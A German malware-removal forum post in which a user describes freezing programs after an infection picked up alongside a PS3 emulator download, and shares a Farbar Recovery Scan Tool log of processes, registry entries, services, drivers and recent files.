Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Win10: Programme halten ständig an (firefox, malwarebytes, adwcleaner..) (https://www.trojaner-board.de/195033-win10-programme-halten-staendig-firefox-malwarebytes-adwcleaner.html)

fantacola 12.02.2019 08:42
Win10: Programme halten ständig an (firefox, malwarebytes, adwcleaner..)
 
Hi zusammen
Dumm genug aber ich habe einen PS360 ERmu installiert und eben verbotenerweise das vermeintliche BIOS dazu besorgt. Danach ging die Chausse los..mailru, wajan und wahrscheinlich noch anderes...
In normalen Modus friert ADWCleaner, Malwarebyter, auch der deinstaller sofort ein. Einzig hitmanpro funktionierte immer - ich find die logfiles dazu leider nicht. Firefox und Chrome gehen ev einen Moment lang und frieren dann auch ein. Windows Explorer ist langsam oder friert auch manchmal ein. Edge ist da etwas besser.
Im Anmhang ein FSTR log von heute, ADWCleaner vom ersten Ereignis und MWB von gestern. Das Programm fror aber während des Scans ein..

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 10.02.2019 01
durchgeführt von Fantacola (Administrator) auf DESKTOP-MB4THTP (12-02-2019 08:09:13)
Gestartet von C:\Users\Fantacola\Desktop
Geladene Profile: Fantacola (Verfügbare Profile: Fantacola & PBIEgwService)
Platform: Windows 10 Home Version 1809 17763.292 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Safe Mode (with Networking)
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1901.7-0\MsMpEng.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe
(Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [557768 2014-09-19] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [TechSmithSnagit] => C:\Program Files\TechSmith\Snagit 2018\Snagit32.exe [9177568 2018-06-25] (TechSmith Corporation -> TechSmith Corporation)
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [757184 2018-06-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-12-15] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [319544 2019-01-03] (Intel(R) Rapid Storage Technology -> Intel Corporation)
HKLM\...\Run: [AM] => C:\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe [625528 2019-02-04] (Zemana D.O.O. Sarajevo -> Zemana Ltd.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [KeePass 2 PreLoad] => C:\Program Files (x86)\KeePass Password Safe 2\KeePass.exe [3282000 2019-01-09] (Open Source Developer, Dominik Reichl -> Dominik Reichl)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [790432 2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [587168 2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
HKLM-x32\...\Winlogon: [Userinit] C:\WINDOWS\system32\userinit.exe, [27648 2018-09-15] (Microsoft Windows -> Microsoft Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Run: [Plex Media Server] => C:\Program Files (x86)\Plex\Plex Media Server\Plex Media Server.exe [17786856 2018-04-12] (Plex, Inc -> Plex, Inc.)
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Run: [BlueJeans] => C:\Users\Fantacola\AppData\Local\Blue Jeans\App\BlueJeans.exe [37697984 2018-03-27] (Blue Jeans Network -> Blue Jeans)
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Run: [NZBGet] => C:\Program Files\NZBGet\nzbget.exe [3780608 2018-06-06] ()
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3131680 2018-11-26] (Valve -> Valve Corporation)
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Run: [KeePass Password Safe 2] => C:\Program Files (x86)\KeePass Password Safe 2\KeePass.exe [3282000 2019-01-09] (Open Source Developer, Dominik Reichl -> Dominik Reichl)
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\RunOnce: [Application Restart #0] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [16490376 2019-02-01] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Policies\Explorer: [NoSecurityTab] 1
HKLM\...\Drivers32: [vidc.i420] => C:\WINDOWS\system32\lvcod64.dll [175392 2012-10-26] (Logitech Inc.)
HKLM\...\Drivers32: [VIDC.RTV1] => C:\WINDOWS\system32\rtvcvfw64.dll [246272 2012-09-28] ()
HKLM\...\Drivers32: [MSVideo] => C:\WINDOWS\system32\vfwwdm32.dll [68096 2018-09-15] (Microsoft Corporation)
HKLM\...\Drivers32-x32: [vidc.i420] => C:\Windows\SysWOW64\lvcodec2.dll [305000 2012-10-26] (Logitech Inc.)
HKLM\...\Drivers32-x32: [VIDC.RTV1] => C:\Windows\SysWOW64\rtvcvfw32.dll [247296 2012-09-28] ()
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2018-12-13] (Google Inc -> Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HeadSetup™ Pro.lnk [2018-12-18]
ShortcutTarget: HeadSetup™ Pro.lnk -> C:\Program Files (x86)\Sennheiser\HeadSetup Pro\HeadSetupPro.exe (Sennheiser Communications A/S)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Launchy.lnk [2018-04-28]
ShortcutTarget: Launchy.lnk -> C:\Program Files (x86)\Launchy\Launchy.exe ()
Startup: C:\Users\Fantacola\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\An OneNote senden.lnk [2019-02-01]
ShortcutTarget: An OneNote senden.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Keine Datei)
GroupPolicy: Beschränkung ? <==== ACHTUNG
GroupPolicy\User: Beschränkung ? <==== ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{8c6feae1-1b5c-4a3c-8fed-eaf756fe3914}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL =
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2018-12-11] (Citrix Systems, Inc. -> Citrix Systems, Inc.)

FireFox:
========
FF DefaultProfile: 0k0aoksh.default-1549916332097
FF ProfilePath: C:\Users\Fantacola\AppData\Roaming\Mozilla\Firefox\Profiles\0k0aoksh.default-1549916332097 [2019-02-12]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-04-19] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-09-19] (Adobe Systems)
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2018-12-11] (Citrix Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-19] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-12-04] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-09-19] (Adobe Systems)

Chrome:
=======
CHR HomePage: Default -> hxxps://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.ch/"
CHR Profile: C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default [2019-02-11]
CHR Extension: (Präsentationen) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-03]
CHR Extension: (Docs) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-03]
CHR Extension: (Google Drive) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-09-03]
CHR Extension: (YouTube) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-03]
CHR Extension: (Tabellen) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-03]
CHR Extension: (Google Docs Offline) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-09-03]
CHR Extension: (Google Mail) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-09-03]
CHR Extension: (Chrome Media Router) - C:\Users\Fantacola\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-10]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2 AMD External Events Utility; C:\WINDOWS\System32\DriverStore\FileRepository\c0338885.inf_amd64_648d9ae54bb276d8\B338884\atiesrxx.exe [508320 2019-02-04] (Advanced Micro Devices, Inc. -> AMD)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7206312 2018-07-20] (BattlEye Innovations e.K. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [780928 2018-07-06] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [17464 2019-01-03] (Intel(R) Rapid Storage Technology -> Intel Corporation)
S2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [391744 2017-07-11] (Canon Inc. -> )
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\SocketHeciServer.exe [775904 2018-09-14] (Intel(R) Trust Services -> Intel(R) Corporation)
S2 Intel(R) TPM Provisioning Service; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\TPMProvisioningService.exe [705760 2018-09-14] (Intel(R) Trust Services -> Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [218176 2018-11-16] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
S2 PBIEgwService; C:\Program Files\On-premises data gateway\Microsoft.PowerBI.EnterpriseGateway.exe [106896 2018-12-20] (Microsoft Corporation -> Microsoft)
S2 PlexUpdateService; C:\Program Files (x86)\Plex\Plex Media Server\Plex Update Service.exe [2212840 2018-04-12] (Plex, Inc -> Plex, Inc.)
S2 RtkAudioUniversalService; C:\WINDOWS\System32\RtkAudUService64.exe [757184 2018-06-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S2 SetupARService; C:\Program Files (x86)\Realtek\Audio\SetupAfterRebootService.exe [10752 2018-12-18] () [Datei ist nicht signiert]
S2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11644656 2018-09-10] (TeamViewer GmbH -> TeamViewer GmbH)
S2 TechSmith Uploader Service; C:\Program Files (x86)\Common Files\TechSmith Shared\Uploader\UploaderService.exe [3661096 2015-09-14] (TechSmith Corporation -> TechSmith Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\NisSrv.exe [4096976 2019-01-24] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\MsMpEng.exe [113992 2019-01-24] (Microsoft Corporation -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0338885.inf_amd64_648d9ae54bb276d8\B338884\atikmdag.sys [52808608 2019-02-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0338885.inf_amd64_648d9ae54bb276d8\B338884\atikmpag.sys [590240 2019-02-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R1 amdrv; C:\WINDOWS\system32\drivers\amdrv.sys [203680 2019-02-11] (Zemana Ltd. -> Zemana Ltd.)
S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [107496 2018-07-17] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [34368 2018-01-16] (CHENGDU YIWO Tech Development Co., Ltd. -> )
R0 EPMVolFlt; C:\WINDOWS\System32\drivers\EPMVolFlt.sys [30280 2018-07-19] (CHENGDU YIWO Tech Development Co., Ltd. -> Windows (R) Codename Longhorn DDK provider)
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] (CHENGDU YIWO Tech Development Co., Ltd. -> ) [Datei ist nicht signiert]
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2019-02-11] (SurfRight B.V. -> )
R0 iaStorAC; C:\WINDOWS\System32\drivers\iaStorAC.sys [1016288 2019-01-03] (Intel(R) Rapid Storage Technology -> Intel Corporation)
S3 IntcAzAudAddService; C:\WINDOWS\system32\drivers\RTKVHD64.sys [5897184 2017-08-10] () [Datei ist nicht signiert]
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [274416 2019-02-12] (Malwarebytes Corporation -> Malwarebytes)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [1131024 2018-10-23] (Realtek Semiconductor Corp. -> Realtek )
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [14024 2017-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2016-03-28] (Apple, Inc.) [Datei ist nicht signiert]
R1 vbdenum; C:\WINDOWS\System32\drivers\vbdenum.sys [119432 2018-10-26] (Citrix Systems, Inc. -> Citrix Systems, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46488 2019-01-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [343032 2019-01-24] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [63480 2019-01-24] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2019-02-12 08:09 - 2019-02-12 08:10 - 000020464 _____ C:\Users\Fantacola\Desktop\FRST.txt
2019-02-12 08:09 - 2019-02-12 08:09 - 000000000 ____D C:\FRST
2019-02-12 08:08 - 2019-02-12 08:08 - 002434048 _____ (Farbar) C:\Users\Fantacola\Desktop\FRST64.exe
2019-02-12 08:07 - 2019-02-12 08:07 - 002434048 _____ (Farbar) C:\Users\Fantacola\Downloads\FRST64.exe
2019-02-12 08:05 - 2019-02-12 08:05 - 007316688 _____ (Malwarebytes) C:\Users\Fantacola\Downloads\adwcleaner_7.2.7.0.exe
2019-02-12 08:05 - 2019-02-12 08:05 - 007316688 _____ (Malwarebytes) C:\Users\Fantacola\Desktop\adwcleaner_7.2.7.0.exe
2019-02-12 07:47 - 2019-02-12 07:47 - 000000000 ____D C:\Program Files\Realtek
2019-02-12 07:45 - 2019-02-12 07:49 - 000274416 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-02-12 07:44 - 2019-02-12 07:44 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190212_074442.txt
2019-02-12 07:42 - 2019-02-12 07:42 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190212_074200.txt
2019-02-11 23:20 - 2019-02-11 23:20 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_232017.txt
2019-02-11 23:11 - 2019-02-11 23:11 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_231111.txt
2019-02-11 23:07 - 2019-02-11 23:07 - 000000000 ____D C:\Users\Fantacola\AppData\LocalLow\AMD
2019-02-11 22:57 - 2019-02-11 22:57 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_225730.txt
2019-02-11 22:48 - 2019-02-12 08:09 - 000019358 _____ C:\WINDOWS\ZAM.krnl.trace
2019-02-11 22:48 - 2019-02-11 22:48 - 000003566 _____ C:\WINDOWS\System32\Tasks\AMHelper
2019-02-11 22:48 - 2019-02-11 22:48 - 000001333 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2019-02-11 22:48 - 2019-02-11 22:48 - 000000000 ____D C:\Users\Fantacola\AppData\Local\Zemana
2019-02-11 22:48 - 2019-02-11 22:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2019-02-11 22:47 - 2019-02-11 22:48 - 000000000 ____D C:\Users\Fantacola\AppData\Local\AMSDK
2019-02-11 22:47 - 2019-02-11 22:47 - 000203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\amdrv.sys
2019-02-11 22:47 - 2019-02-11 22:47 - 000000000 ____D C:\Program Files (x86)\Zemana
2019-02-11 22:42 - 2019-02-11 22:42 - 011551928 _____ (Zemana Ltd. ) C:\Users\Fantacola\Downloads\AntiMalware_Setup.exe
2019-02-11 22:37 - 2019-02-11 22:37 - 000010752 _____ C:\WINDOWS\SetupAfterRebootService.exe
2019-02-11 22:36 - 2019-02-11 22:36 - 000000000 ____D C:\Users\Fantacola\AppData\Local\mbam
2019-02-11 22:35 - 2019-02-11 22:35 - 000000000 ____D C:\Users\Fantacola\AppData\Local\mbamtray
2019-02-11 22:34 - 2019-02-11 22:34 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-11 22:34 - 2019-02-11 22:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-11 22:34 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2019-02-11 22:34 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-02-11 22:33 - 2019-02-11 22:33 - 000000000 ____T C:\WINDOWS\system32\Elan_FP_Image_20190211_223354.txt
2019-02-11 22:32 - 2019-02-11 22:32 - 000000000 ____D C:\Users\Fantacola\AppData\Roaming\Intel Corporation
2019-02-11 22:32 - 2019-02-11 22:32 - 000000000 ____D C:\Program Files\Common Files\Intel Corporation
2019-02-11 22:31 - 2019-02-11 22:31 - 000002339 _____ C:\Users\Public\Desktop\Intel® Rapid Storage Technology.lnk
2019-02-11 22:31 - 2019-02-11 22:31 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2019-02-11 22:31 - 2019-02-11 22:31 - 000000000 ____D C:\Program Files\Common Files\Intel
2019-02-11 22:30 - 2019-02-11 22:30 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2019-02-11 22:30 - 2019-02-11 22:30 - 000000000 ____D C:\Users\Fantacola\Downloads\mb_driver_intel_irst_17.0.0.1072
2019-02-11 22:30 - 2018-10-23 13:24 - 001131024 _____ (Realtek ) C:\WINDOWS\system32\Drivers\rt640x64.sys
2019-02-11 22:29 - 2019-02-11 22:29 - 000000000 ____D C:\Users\Fantacola\Downloads\mb_driver_lan_realtek_10.031_1023.2018
2019-02-11 22:27 - 2019-02-11 22:27 - 020645590 _____ C:\Users\Fantacola\Downloads\mb_driver_intel_irst_17.0.0.1072.zip
2019-02-11 22:26 - 2019-02-11 22:26 - 011132539 _____ C:\Users\Fantacola\Downloads\mb_driver_lan_realtek_10.031_1023.2018.zip
2019-02-11 22:25 - 2019-02-11 22:25 - 000000000 ____D C:\Users\Fantacola\Downloads\mb_driver_intel_me_corporate_11.8.60.3561
2019-02-11 22:24 - 2019-02-11 22:24 - 109553257 _____ C:\Users\Fantacola\Downloads\mb_driver_intel_me_corporate_11.8.60.3561.zip
2019-02-11 22:22 - 2019-02-11 22:22 - 250602270 _____ C:\Users\Fantacola\Downloads\mb_driver_audio_realtek_100series.zip
